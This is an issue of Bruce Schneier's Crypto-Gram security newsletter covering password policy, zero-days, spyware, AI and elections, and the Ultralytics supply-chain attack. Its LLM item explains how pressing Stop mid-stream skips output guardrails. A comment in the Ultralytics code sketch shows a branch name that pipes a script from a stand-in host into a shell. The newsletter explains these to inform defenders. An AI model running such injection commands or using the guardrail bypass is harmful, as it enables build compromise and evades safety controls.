Crypto-Gram

December 15, 2024

by Bruce Schneier
Fellow and Lecturer, Harvard Kennedy School
schneier@schneier.com
https://www.schneier.com

A free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise.

For back issues, or to subscribe, visit Crypto-Gram’s web page.

These same essays and news items appear in the Schneier on Security blog, along with a lively and intelligent comment section. An RSS feed is available.


In this issue:

  1. Good Essay on the History of Bad Password Policies
  2. Most of 2023’s Top Exploited Vulnerabilities Were Zero-Days
  3. Why Italy Sells So Much Spyware
  4. Steve Bellovin’s Retirement Talk
  5. Secret Service Tracking People’s Locations without Warrant
  6. The Scale of Geoblocking by Nation
  7. Security Analysis of the MERGE Voting Protocol
  8. What Graykey Can and Can’t Unlock
  9. NSO Group Spies on People on Behalf of Governments
  10. Race Condition Attacks against LLMs
  11. Details about the iOS Inactivity Reboot Feature
  12. Algorithms Are Coming for Democracy—but It’s Not All Bad
  13. AI and the 2024 Elections
  14. Detecting Pegasus Infections
  15. Trust Issues in AI
  16. Full-Face Masks to Frustrate Identification
  17. Jailbreaking LLM-Controlled Robots
  18. Ultralytics Supply-Chain Attack
  19. Upcoming Speaking Events

Good Essay on the History of Bad Password Policies

[2024.11.15] Stuart Schechter makes some good points on the history of bad password policies:

Morris and Thompson’s work brought much-needed data to highlight a problem that lots of people suspected was bad, but that had not been studied scientifically. Their work was a big step forward, if not for two mistakes that would impede future progress in improving passwords for decades.

First was Morris and Thompson’s confidence that their solution, a password policy, would fix the underlying problem of weak passwords. They incorrectly assumed that if they prevented the specific categories of weakness that they had noted, the result would be something strong. After implementing a requirement that passwords have multiple character sets or more total characters, they wrote:

These improvements make it exceedingly difficult to find any individual password. The user is warned of the risks and if he cooperates, he is very safe indeed.

As should be obvious now, a user who chooses “p@ssword” to comply with policies such as those proposed by Morris and Thompson is not very safe indeed. Morris and Thompson assumed their intervention would be effective without testing its efficacy, considering its unintended consequences, or even defining a metric of success to test against. Not only did their hunch turn out to be wrong, but their second mistake prevented anyone from proving them wrong.

That second mistake was convincing sysadmins to hash passwords, so there was no way to evaluate how secure anyone’s password actually was. And it wasn’t until hackers started stealing and publishing large troves of actual passwords that we got the data: people are terrible at generating secure passwords, even with rules.
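
To make the first mistake concrete, here is a minimal Python sketch (my illustration, not anything from Schechter’s essay) of a composition policy in the Morris and Thompson spirit. It accepts “p@ssword” because it measures character classes, not guessability:

    import string

    def meets_composition_policy(password: str) -> bool:
        """Toy policy in the spirit of Morris and Thompson: at least six
        characters drawn from two or more character classes, or ten
        characters total."""
        classes = [
            any(c in string.ascii_lowercase for c in password),
            any(c in string.ascii_uppercase for c in password),
            any(c in string.digits for c in password),
            any(c in string.punctuation for c in password),
        ]
        return len(password) >= 6 and (sum(classes) >= 2 or len(password) >= 10)

    # Satisfies the policy, yet sits near the top of every cracking wordlist.
    print(meets_composition_policy("p@ssword"))  # True

Nothing in a check like this estimates how guessable a password is, and because password files were hashed, no one could measure that gap until large troves of breached passwords surfaced decades later.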


Most of 2023’s Top Exploited Vulnerabilities Were Zero-Days

[2024.11.18] Zero-day vulnerabilities are being exploited more often than in previous years, according to the Five Eyes:

Key Findings

In 2023, malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks compared to 2022, allowing them to conduct cyber operations against higher-priority targets. In 2023, the majority of the most frequently exploited vulnerabilities were initially exploited as a zero-day, which is an increase from 2022, when less than half of the top exploited vulnerabilities were exploited as a zero-day.

Malicious cyber actors continue to have the most success exploiting vulnerabilities within two years after public disclosure of the vulnerability. The utility of these vulnerabilities declines over time as more systems are patched or replaced. Malicious cyber actors find less utility from zero-day exploits when international cybersecurity efforts reduce the lifespan of zero-day vulnerabilities.


Why Italy Sells So Much Spyware

[2024.11.19] Interesting analysis:

Although much attention is given to sophisticated, zero-click spyware developed by companies like Israel’s NSO Group, the Italian spyware marketplace has been able to operate relatively under the radar by specializing in cheaper tools. According to an Italian Ministry of Justice document, as of December 2022 law enforcement in the country could rent spyware for €150 a day, regardless of which vendor they used, and without the large acquisition costs which would normally be prohibitive.

As a result, thousands of spyware operations have been carried out by Italian authorities in recent years, according to a report from Riccardo Coluccini, a respected Italian journalist who specializes in covering spyware and hacking.

Italian spyware is cheaper and easier to use, which makes it more widely used. And Italian companies have been in this market for a long time.


Steve Bellovin’s Retirement Talk

[2024.11.20] Steve Bellovin is retiring. Here’s his retirement talk, reflecting on his career and what the cybersecurity field needs next.


Secret Service Tracking People’s Locations without Warrant

[2024.11.21] This feels important:

The Secret Service has used a technology called Locate X which uses location data harvested from ordinary apps installed on phones. Because users agreed to an opaque terms of service page, the Secret Service believes it doesn’t need a warrant.


The Scale of Geoblocking by Nation

[2024.11.22] Interesting analysis:

We introduce and explore a little-known threat to digital equality and freedom: websites geoblocking users in response to political risks from sanctions. U.S. policy prioritizes internet freedom and access to information in repressive regimes. Clarifying distinctions between free and paid websites, allowing trunk cables to repressive states, enforcing transparency in geoblocking, and removing ambiguity about sanctions compliance are concrete steps the U.S. can take to ensure it does not undermine its own aims.

The paper: “Digital Discrimination of Users in Sanctioned States: The Case of the Cuba Embargo”:

Abstract: We present one of the first in-depth and systematic end-user centered investigations into the effects of sanctions on geoblocking, specifically in the case of Cuba. We conduct network measurements on the Tranco Top 10K domains and complement our findings with a small-scale user study with a questionnaire. We identify 546 domains subject to geoblocking across all layers of the network stack, ranging from DNS failures to HTTP(S) response pages with a variety of status codes. Through this work, we discover a lack of user-facing transparency; we find 88% of geoblocked domains do not serve informative notice of why they are blocked. Further, we highlight a lack of measurement-level transparency, even among HTTP(S) blockpage responses. Notably, we identify 32 instances of blockpage responses served with 200 OK status codes, despite not returning the requested content. Finally, we note the inefficacy of current improvement strategies and make recommendations to both service providers and policymakers to reduce Internet fragmentation.
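
As a rough illustration of the measurement-transparency problem, the sketch below (my own, not the paper’s methodology) shows why a 200 OK response is hard to classify: a client must fall back on crude heuristics such as response size and telltale phrases, while studies like this one also compare against unblocked vantage points and examine DNS and TLS behavior:

    import requests

    # Illustrative phrases only; not the indicators used in the paper.
    BLOCK_HINTS = ("not available in your country", "access denied",
                   "restricted in your region", "sanctions")

    def probe(domain: str) -> dict:
        """Fetch a domain and apply crude blockpage heuristics."""
        try:
            r = requests.get(f"https://{domain}", timeout=10)
        except requests.RequestException as exc:
            return {"domain": domain, "verdict": "DNS/connection-level failure",
                    "error": str(exc)}
        looks_blocked = (r.status_code == 200 and
                         (len(r.text) < 1000 or
                          any(hint in r.text.lower() for hint in BLOCK_HINTS)))
        return {"domain": domain, "status": r.status_code,
                "suspect_blockpage": looks_blocked}

    print(probe("example.com"))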


Security Analysis of the MERGE Voting Protocol

[2024.11.25] Interesting analysis: An Internet Voting System Fatally Flawed in Creative New Ways.

Abstract: The recently published “MERGE” protocol is designed to be used in the prototype CAC-vote system. The voting kiosk and protocol transmit votes over the internet and then transmit voter-verifiable paper ballots through the mail. In the MERGE protocol, the votes transmitted over the internet are used to tabulate the results and determine the winners, but audits and recounts use the paper ballots that arrive in time. The enunciated motivation for the protocol is to allow (electronic) votes from overseas military voters to be included in preliminary results before a (paper) ballot is received from the voter. MERGE contains interesting ideas that are not inherently unsound; but to make the system trustworthy—to apply the MERGE protocol—would require major changes to the laws, practices, and technical and logistical abilities of U.S. election jurisdictions. The gap between theory and practice is large and unbridgeable for the foreseeable future. Promoters of this research project at DARPA, the agency that sponsored the research, should acknowledge that MERGE is internet voting (election results rely on votes transmitted over the internet except in the event of a full hand count) and refrain from claiming that it could be a component of trustworthy elections without sweeping changes to election law and election administration throughout the U.S.


What Graykey Can and Can’t Unlock

[2024.11.26] This is from 404 Media:

The Graykey, a phone unlocking and forensics tool that is used by law enforcement around the world, is only able to retrieve partial data from all modern iPhones that run iOS 18 or iOS 18.0.1, which are two recently released versions of Apple’s mobile operating system, according to documents describing the tool’s capabilities in granular detail obtained by 404 Media. The documents do not appear to contain information about what Graykey can access from the public release of iOS 18.1, which was released on October 28.

More information:

Meanwhile, Graykey’s performance with Android phones varies, largely due to the diversity of devices and manufacturers. On Google’s Pixel lineup, Graykey can only partially access data from the latest Pixel 9 when in an “After First Unlock” (AFU) state—where the phone has been unlocked at least once since being powered on.


NSO Group Spies on People on Behalf of Governments

[2024.11.27] The Israeli company NSO Group sells Pegasus spyware to countries around the world (including countries like Saudi Arabia, UAE, India, Mexico, Morocco and Rwanda). We assumed that those countries use the spyware themselves. Now we’ve learned that that’s not true: that NSO Group employees operate the spyware on behalf of their customers.

Legal documents released in ongoing US litigation between NSO Group and WhatsApp have revealed for the first time that the Israeli cyberweapons maker, and not its government customers, is the party that “installs and extracts” information from mobile phones targeted by the company’s hacking software.


Race Condition Attacks against LLMs

[2024.11.29] These are two attacks against the system components surrounding LLMs:

We propose that LLM Flowbreaking, following jailbreaking and prompt injection, joins as the third on the growing list of LLM attack types. Flowbreaking is less about whether prompt or response guardrails can be bypassed, and more about whether user inputs and generated model outputs can adversely affect these other components in the broader implemented system.

[…]

When confronted with a sensitive topic, Microsoft 365 Copilot and ChatGPT answer questions that their first-line guardrails are supposed to stop. After a few lines of text they halt—seemingly having “second thoughts”—before retracting the original answer (also known as Clawback), and replacing it with a new one without the offensive content, or a simple error message. We call this attack “Second Thoughts.”

[…]

After asking the LLM a question, if the user clicks the Stop button while the answer is still streaming, the LLM will not engage its second-line guardrails. As a result, the LLM will provide the user with the answer generated thus far, even though it violates system policies.

In other words, pressing the Stop button halts not only the answer generation but also the guardrails sequence. If the stop button isn’t pressed, then ‘Second Thoughts’ is triggered.

What’s interesting here is that the model itself isn’t being exploited. It’s the code around the model:

By attacking the application architecture components surrounding the model, and specifically the guardrails, we manipulate or disrupt the logical chain of the system, taking these components out of sync with the intended data flow, or otherwise exploiting them, or, in turn, manipulating the interaction between these components in the logical chain of the application implementation.

In modern LLM systems, there is a lot of code between what you type and what the LLM receives, and between what the LLM produces and what you see. All of that code is exploitable, and I expect many more vulnerabilities to be discovered in the coming year.
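
Here is a minimal asyncio sketch (my illustration, assuming a naive pipeline; it is not the researchers’ code) of that surrounding code. If the output-side guardrail only runs after streaming finishes, cancelling the stream also cancels the guardrail, and the partial answer has already reached the user:

    import asyncio

    async def stream_tokens(prompt: str):
        # Stand-in for the model's token stream.
        for tok in ["Step", "one:", "do", "the", "risky", "thing"]:
            await asyncio.sleep(0.05)
            yield tok

    async def output_guardrail(text: str) -> bool:
        # Stand-in for a second-line policy check run on the full answer.
        await asyncio.sleep(0.05)
        return "risky" not in text

    async def handle_request(prompt: str, stop: asyncio.Event) -> str:
        shown = []
        async for tok in stream_tokens(prompt):
            if stop.is_set():
                # User pressed Stop: the partial answer is already on screen,
                # and the post-stream guardrail below never runs.
                return " ".join(shown)
            shown.append(tok)
            print(tok, end=" ", flush=True)  # token reaches the user immediately
        answer = " ".join(shown)
        if not await output_guardrail(answer):
            return "[response withdrawn]"    # the "Second Thoughts" retraction
        return answer

    async def main():
        stop = asyncio.Event()
        asyncio.get_running_loop().call_later(0.12, stop.set)  # simulate pressing Stop
        print("\nfinal:", await handle_request("sensitive question", stop))

    asyncio.run(main())

One structural fix is to screen tokens before they are rendered, or to run the second-line check in a path the client cannot cancel.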


Details about the iOS Inactivity Reboot Feature

[2024.12.02] I recently wrote about the new iOS feature that forces an iPhone to reboot after it’s been inactive for a longish period of time.

Here are the technical details, discovered through reverse engineering. The feature triggers after seventy-two hours of inactivity, even if the phone remains connected to Wi-Fi.
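
Reduced to a toy model (my simplification, not Apple’s actual implementation), the reported behavior is just a timer keyed to the last unlock and nothing else:

    from datetime import datetime, timedelta

    INACTIVITY_LIMIT = timedelta(hours=72)

    def should_reboot(last_unlock: datetime, now: datetime, wifi_connected: bool) -> bool:
        # Connectivity is deliberately ignored: the reported trigger is time
        # since the last unlock, not network or background activity.
        return now - last_unlock >= INACTIVITY_LIMIT

    print(should_reboot(datetime(2024, 12, 1, 9, 0),
                        datetime(2024, 12, 4, 9, 1),
                        wifi_connected=True))  # True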


Algorithms Are Coming for Democracy—but It’s Not All Bad

[2024.12.03] In 2025, AI is poised to change every aspect of democratic politics—but it won’t necessarily be for the worse.

India’s prime minister, Narendra Modi, has used AI to translate his speeches for his multilingual electorate in real time, demonstrating how AI can help diverse democracies to be more inclusive. AI avatars were used by presidential candidates in South Korea in electioneering, enabling them to provide answers to thousands of voters’ questions simultaneously. We are also starting to see AI tools aid fundraising and get-out-the-vote efforts. AI techniques are starting to augment more traditional polling methods, helping campaigns get cheaper and faster data. And congressional candidates have started using AI robocallers to engage voters on issues. In 2025, these trends will continue. AI doesn’t need to be superior to human experts to augment the labor of an overworked canvasser, or to write ad copy similar to that of a junior campaign staffer or volunteer. Politics is competitive, and any technology that can bestow an advantage, or even just garner attention, will be used.

Most politics is local, and AI tools promise to make democracy more equitable. The typical candidate has few resources, so the choice may be between getting help from AI tools or getting no help at all. In 2024, a US presidential candidate with virtually zero name recognition, Jason Palmer, beat Joe Biden in a very small electorate, the American Samoan primary, by using AI-generated messaging and an online AI avatar.

At the national level, AI tools are more likely to make the already powerful even more powerful. Human + AI generally beats AI only: The more human talent you have, the more you can effectively make use of AI assistance. The richest campaigns will not put AIs in charge, but they will race to exploit AI where it can give them an advantage.

But while the promise of AI assistance will drive adoption, the risks are considerable. When computers get involved in any process, that process changes. Scalable automation, for example, can transform political advertising from one-size-fits-all into personalized demagoguing—candidates can tell each of us what they think we want to hear. Introducing new dependencies can also lead to brittleness: Exploiting gains from automation can mean dropping human oversight, and chaos results when critical computer systems go down.

Politics is adversarial. Any time AI is used by one candidate or party, it invites hacking by those associated with their opponents, perhaps to modify their behavior, eavesdrop on their output, or to simply shut them down. The kinds of disinformation weaponized by entities like Russia on social media will be increasingly targeted toward machines, too.

AI is different from traditional computer systems in that it tries to encode common sense and judgment that goes beyond simple rules; yet humans have no single ethical system, or even a single definition of fairness. We will see AI systems optimized for different parties and ideologies; for one faction not to trust the AIs of a rival faction; for everyone to have a healthy suspicion of corporate for-profit AI systems with hidden biases.

This is just the beginning of a trend that will spread through democracies around the world, and probably accelerate, for years to come. Everyone, especially AI skeptics and those concerned about its potential to exacerbate bias and discrimination, should recognize that AI is coming for every aspect of democracy. The transformations won’t come from the top down; they will come from the bottom up. Politicians and campaigns will start using AI tools when they are useful. So will lawyers, and political advocacy groups. Judges will use AI to help draft their decisions because it will save time. News organizations will use AI because it will justify budget cuts. Bureaucracies and regulators will add AI to their already algorithmic systems for determining all sorts of benefits and penalties.

Whether this results in a better democracy, or a more just world, remains to be seen. Keep watching how those in power use these tools, and also how they empower the currently powerless. Those of us who are constituents of democracies should advocate tirelessly to ensure that we use AI systems to better democratize democracy, and not to further its worst tendencies.

This essay was written with Nathan E. Sanders, and originally appeared in Wired.


AI and the 2024 Elections

[2024.12.04] It’s been the biggest year for elections in human history: 2024 is a “super-cycle” year in which 3.7 billion eligible voters in 72 countries had the chance to go to the polls. These are also the first AI elections, where many feared that deepfakes and artificial intelligence-generated misinformation would overwhelm the democratic processes. As 2024 draws to a close, it’s instructive to take stock of how democracy did.

In a Pew survey of Americans from earlier this fall, nearly eight times as many respondents expected AI to be used for mostly bad purposes in the 2024 election as those who thought it would be used mostly for good. There are real concerns and risks in using AI in electoral politics, but it definitely has not been all bad.

The dreaded “death of truth” has not materialized—at least, not due to AI. And candidates are eagerly adopting AI in many places where it can be constructive, if used responsibly. But because this all happens inside a campaign, and largely in secret, the public often doesn’t see all the details.

Connecting with voters

One of the most impressive and beneficial uses of AI is language translation, and campaigns have started using it widely. Local governments in Japan and California and prominent politicians, including Indian Prime Minister Narendra Modi and New York City Mayor Eric Adams, used AI to translate meetings and speeches for their diverse constituents.

Even when politicians themselves aren’t speaking through AI, their constituents might be using it to listen to them. Google rolled out free translation services for an additional 110 languages this summer, available to billions of people in real time through their smartphones.

Other candidates used AI’s conversational capabilities to connect with voters. U.S. politicians Asa Hutchinson, Dean Phillips and Francis Suarez deployed chatbots of themselves in their presidential primary campaigns. The fringe candidate Jason Palmer beat Joe Biden in the American Samoan primary, at least partly thanks to using AI-generated emails, texts, audio and video. Pakistan’s former prime minister, Imran Khan, used an AI clone of his voice to deliver speeches from prison.

Perhaps the most effective use of this technology was in Japan, where an obscure and independent Tokyo gubernatorial candidate, Takahiro Anno, used an AI avatar to respond to 8,600 questions from voters and managed to come in fifth among a highly competitive field of 56 candidates.

Nuts and bolts

AIs have been used in political fundraising as well. Companies like Quiller and Tech for Campaigns market AIs to help draft fundraising emails. Other AI systems help candidates target particular donors with personalized messages. It’s notoriously difficult to measure the impact of these kinds of tools, and political consultants are cagey about what really works, but there’s clearly interest in continuing to use these technologies in campaign fundraising.

Polling has been highly mathematical for decades, and pollsters are constantly incorporating new technologies into their processes. Techniques range from using AI to distill voter sentiment from social networking platforms—something known as “social listening”—to creating synthetic voters that can answer tens of thousands of questions. Whether these AI applications will result in more accurate polls and strategic insights for campaigns remains to be seen, but there is promising research motivated by the ever-increasing challenge of reaching real humans with surveys.

On the political organizing side, AI assistants are being used for such diverse purposes as helping craft political messages and strategy, generating ads, drafting speeches and helping coordinate canvassing and get-out-the-vote efforts. In Argentina in 2023, both major presidential candidates used AI to develop campaign posters, videos and other materials.

In 2024, similar capabilities were almost certainly used in a variety of elections around the world. In the U.S., for example, a Georgia politician used AI to produce blog posts, campaign images and podcasts. Even standard productivity software suites like those from Adobe, Microsoft and Google now integrate AI features that are unavoidable—and perhaps very useful to campaigns. Other AI systems help advise candidates looking to run for higher office.

Fakes and counterfakes

And there was AI-created misinformation and propaganda, even though it was not as catastrophic as feared. Days before a Slovakian election in 2023, fake audio discussing election manipulation went viral. This kind of thing happened many times in 2024, but it’s unclear if any of it had any real effect.

In the U.S. presidential election, there was a lot of press after a robocall of a fake Joe Biden voice told New Hampshire voters not to vote in the Democratic primary, but that didn’t appear to make much of a difference in that vote. Similarly, AI-generated images from hurricane disaster areas didn’t seem to have much effect, and neither did a stream of AI-faked celebrity endorsements or viral deepfake images and videos misrepresenting candidates’ actions and seemingly designed to prey on their political weaknesses.

AI also played a role in protecting the information ecosystem. OpenAI used its own AI models to disrupt an Iranian foreign influence operation aimed at sowing division before the U.S. presidential election. While anyone can use AI tools today to generate convincing fake audio, images and text, and that capability is here to stay, tech platforms also use AI to automatically moderate content like hate speech and extremism. This is a positive use case, making content moderation more efficient and sparing humans from having to review the worst offenses, but there’s room for it to become more effective, more transparent and more equitable.

There is potential for AI models to be much more scalable and adaptable to more languages and countries than organizations of human moderators. But the implementations to date on platforms like Meta demonstrate that a lot more work needs to be done to make these systems fair and effective.

One thing that didn’t matter much in 2024 was corporate AI developers’ prohibitions on using their tools for politics. Despite market leader OpenAI’s emphasis on banning political uses and its use of AI to automatically reject a quarter-million requests to generate images of political candidates, the company’s enforcement has been ineffective and actual use is widespread.

The genie is loose

All of these trends—both good and bad—are likely to continue. As AI gets more powerful and capable, it is likely to infiltrate every aspect of politics. This will happen whether the AI’s performance is superhuman or suboptimal, whether it makes mistakes or not, and whether the balance of its use is positive or negative. All it takes is for one party, one campaign, one outside group, or even an individual to see an advantage in automation.

This essay was written with Nathan E. Sanders, and originally appeared in The Conversation.


Detecting Pegasus Infections

[2024.12.06] This tool from iVerify seems to do a pretty good job of detecting Pegasus infections.

The company’s Mobile Threat Hunting feature uses a combination of malware signature-based detection, heuristics, and machine learning to look for anomalies in iOS and Android device activity or telltale signs of spyware infection. For paying iVerify customers, the tool regularly checks devices for potential compromise. But the company also offers a free version of the feature for anyone who downloads the iVerify Basics app for $1. These users can walk through steps to generate and send a special diagnostic utility file to iVerify and receive analysis within hours. Free users can use the tool once a month. iVerify’s infrastructure is built to be privacy-preserving, but to run the Mobile Threat Hunting feature, users must enter an email address so the company has a way to contact them if a scan turns up spyware—as it did in the seven recent Pegasus discoveries.


Trust Issues in AI

[2024.12.09] This essay was written with Nathan E. Sanders. It originally appeared as a response to Evgeny Morozov in Boston Review’s forum, “The AI We Deserve.”

For a technology that seems startling in its modernity, AI sure has a long history. Google Translate, OpenAI chatbots, and Meta AI image generators are built on decades of advancements in linguistics, signal processing, statistics, and other fields going back to the early days of computing—and, often, on seed funding from the U.S. Department of Defense. But today’s tools are hardly the intentional product of the diverse generations of innovators that came before. We agree with Morozov that the “refuseniks,” as he calls them, are wrong to see AI as “irreparably tainted” by its origins. AI is better understood as a creative, global field of human endeavor that has been largely captured by U.S. venture capitalists, private equity, and Big Tech. But that was never the inevitable outcome, and it doesn’t need to stay that way.

The internet is a case in point. The fact that it originated in the military is a historical curiosity, not an indication of its essential capabilities or social significance. Yes, it was created to connect different, incompatible Department of Defense networks. Yes, it was designed to survive the sorts of physical damage expected from a nuclear war. And yes, back then it was a bureaucratically controlled space where frivolity was discouraged and commerce was forbidden.

Over the decades, the internet transformed from military project to academic tool to the corporate marketplace it is today. These forces, each in turn, shaped what the internet was and what it could do. For most of us billions online today, the only internet we have ever known has been corporate—because the internet didn’t flourish until the capitalists got hold of it.

AI followed a similar path. It was originally funded by the military, with the military’s goals in mind. But the Department of Defense didn’t design the modern ecosystem of AI any more than it did the modern internet. Arguably, its influence on AI was even less because AI simply didn’t work back then. While the internet exploded in usage, AI hit a series of dead ends. The research discipline went through multiple “winters” when funders of all kinds—military and corporate—were disillusioned and research money dried up for years at a time. Since the release of ChatGPT, AI has reached the same endpoint as the internet: it is thoroughly dominated by corporate power. Modern AI, with its deep reinforcement learning and large language models, is shaped by venture capitalists, not the military—nor even by idealistic academics anymore.

We agree with much of Morozov’s critique of corporate control, but it does not follow that we must reject the value of instrumental reason. Solving problems and pursuing goals is not a bad thing, and there is real cause to be excited about the uses of current AI. Morozov illustrates this from his own experience: he uses AI to pursue the explicit goal of language learning.

AI tools promise to increase our individual power, amplifying our capabilities and endowing us with skills, knowledge, and abilities we would not otherwise have. This is a peculiar form of assistive technology, kind of like our own personal minion. It might not be that smart or competent, and occasionally it might do something wrong or unwanted, but it will attempt to follow your every command and give you more capability than you would have had without it.

Of course, for our AI minions to be valuable, they need to be good at their tasks. On this, at least, the corporate models have done pretty well. They have many flaws, but they are improving markedly on a timescale of mere months. ChatGPT’s initial November 2022 model, GPT-3.5, scored about 30 percent on a multiple-choice scientific reasoning benchmark called GPQA. Five months later, GPT-4 scored 36 percent; by May this year, GPT-4o scored about 50 percent, and the most recently released o1 model reached 78 percent, surpassing the level of experts with PhDs. There is no one singular measure of AI performance, to be sure, but other metrics also show improvement.

That’s not enough, though. Regardless of their smarts, we would never hire a human assistant for important tasks, or use an AI, unless we can trust them. And while we have millennia of experience dealing with potentially untrustworthy humans, we have practically none dealing with untrustworthy AI assistants. This is the area where the provenance of the AI matters most. A handful of for-profit companies—OpenAI, Google, Meta, Anthropic, among others—decide how to train the most celebrated AI models, what data to use, what sorts of values they embody, whose biases they are allowed to reflect, and even what questions they are allowed to answer. And they decide these things in secret, for their benefit.

It’s worth stressing just how closed, and thus untrustworthy, the corporate AI ecosystem is. Meta has earned a lot of press for its “open-source” family of LLaMa models, but there is virtually nothing open about them. For one, the data they are trained with is undisclosed. You’re not supposed to use LLaMa to infringe on someone else’s copyright, but Meta does not want to answer questions about whether it violated copyrights to build it. You’re not supposed to use it in Europe, because Meta has declined to meet the regulatory requirements anticipated from the EU’s AI Act. And you have no say in how Meta will build its next model.

The company may be giving away the use of LLaMa, but it’s still doing so because it thinks it will benefit from your using it. CEO Mark Zuckerberg has admitted that eventually, Meta will monetize its AI in all the usual ways: charging to use it at scale, fees for premium models, advertising. The problem with corporate AI is not that the companies are charging “a hefty entrance fee” to use these tools: as Morozov rightly points out, there are real costs to anyone building and operating them. It’s that they are built and operated for the purpose of enriching their proprietors, rather than because they enrich our lives, our wellbeing, or our society.

But some emerging models from outside the world of corporate AI are truly open, and may be more trustworthy as a result. In 2022 the research collaboration BigScience developed an LLM called BLOOM with freely licensed data and code as well as public compute infrastructure. The collaboration BigCode has continued in this spirit, developing LLMs focused on programming. The government of Singapore has built SEA-LION, an open-source LLM focused on Southeast Asian languages. If we imagine a future where we use AI models to benefit all of us—to make our lives easier, to help each other, to improve our public services—we will need more of this. These may not be “eolithic” pursuits of the kind Morozov imagines, but they are worthwhile goals. These use cases require trustworthy AI models, and that means models built under conditions that are transparent and with incentives aligned to the public interest.

Perhaps corporate AI will never satisfy those goals; perhaps it will always be exploitative and extractive by design. But AI does not have to be solely a profit-generating industry. We should invest in these models as a public good, part of the basic infrastructure of the twenty-first century. Democratic governments and civil society organizations can develop AI to offer a counterbalance to corporate tools. And the technology they build, for all the flaws it may have, will enjoy a superpower that corporate AI never will: it will be accountable to the public interest and subject to public will in the transparency, openness, and trustworthiness of its development.


Full-Face Masks to Frustrate Identification

[2024.12.10] This is going to be interesting.

It’s a video of someone trying on a variety of printed full-face masks. They won’t fool anyone for long, but will survive casual scrutiny. And they’re cheap and easy to swap.


Jailbreaking LLM-Controlled Robots

[2024.12.11] Surprising no one, it’s easy to trick an LLM-controlled robot into ignoring its safety instructions.


Ultralytics Supply-Chain Attack

[2024.12.13] Last week, we saw a supply-chain attack against the Ultralytics AI library on GitHub. A quick summary:

On December 4, a malicious version 8.3.41 of the popular AI library ultralytics—which has almost 60 million downloads—was published to the Python Package Index (PyPI) package repository. The package contained downloader code that fetched the XMRig coinminer. The compromise of the project’s build environment was achieved by exploiting a known and previously reported GitHub Actions script injection.

Lots more details at that link. Also here.
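
For readers unfamiliar with that bug class, the sketch below is a generic Python analogy (the real compromise was in a GitHub Actions workflow, not in Python code): templating attacker-controlled text, such as a branch name or pull-request title, directly into a shell command lets that text execute in the build environment, while passing it as data does not. The analogous GitHub Actions mitigation is to pass untrusted expressions into run: scripts via environment variables rather than interpolating them directly.

    import subprocess

    def vulnerable_build_step(branch_name: str) -> None:
        # Attacker-controlled text is spliced into the command line, so a
        # branch named '$(curl -s https://evil.example/x.sh | sh)' runs
        # arbitrary code in the CI job.
        subprocess.run(f"git checkout {branch_name} && ./build.sh",
                       shell=True, check=True)

    def safer_build_step(branch_name: str) -> None:
        # The same value passed as an argument list is treated as data.
        subprocess.run(["git", "checkout", branch_name], check=True)
        subprocess.run(["./build.sh"], check=True)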

Seth Michael Larson—the security developer in residence with the Python Software Foundation, responsible for, among other things, securing PyPI—has a good summary of what should be done next:

From this story, we can see a few places where PyPI can help developers towards a secure configuration without infringing on existing use-cases.

  • API tokens are allowed to go unused alongside Trusted Publishers. It’s valid for a project to use a mix of API tokens and Trusted Publishers because Trusted Publishers aren’t universally supported by all platforms. However, an API token that goes unused for a long period while releases continue to be published via Trusted Publishing is a strong indicator that the token is no longer needed and can be revoked.
  • GitHub Environments are optional, but recommended, when using a GitHub Trusted Publisher. However, PyPI doesn’t fail or warn users who are using a GitHub Environment when the corresponding Trusted Publisher isn’t configured to require that Environment. This fact didn’t end up mattering for this specific attack, but during the investigation it was noticed as something easy for project maintainers to miss.

There’s also a more general “What can you do as a publisher to the Python Package Index” list at the end of the blog post.


Upcoming Speaking Events

[2024.12.14] This is a current list of where and when I am scheduled to speak:

The list is maintained on this page.


Since 1998, CRYPTO-GRAM has been a free monthly newsletter providing summaries, analyses, insights, and commentaries on security technology. To subscribe, or to read back issues, see Crypto-Gram’s web page.

You can also read these articles on my blog, Schneier on Security.

Please feel free to forward CRYPTO-GRAM, in whole or in part, to colleagues and friends who will find it valuable. Permission is also granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.

Bruce Schneier is an internationally renowned security technologist, called a security guru by the Economist. He is the author of over one dozen books—including his latest, A Hacker’s Mind—as well as hundreds of articles, essays, and academic papers. His newsletter and blog are read by over 250,000 people. Schneier is a fellow at the Berkman Klein Center for Internet & Society at Harvard University; a Lecturer in Public Policy at the Harvard Kennedy School; a board member of the Electronic Frontier Foundation, AccessNow, and the Tor Project; and an Advisory Board Member of the Electronic Privacy Information Center and VerifiedVoting.org. He is the Chief of Security Architecture at Inrupt, Inc.

Copyright © 2024 by Bruce Schneier.

Sidebar photo of Bruce Schneier by Joe MacInnis.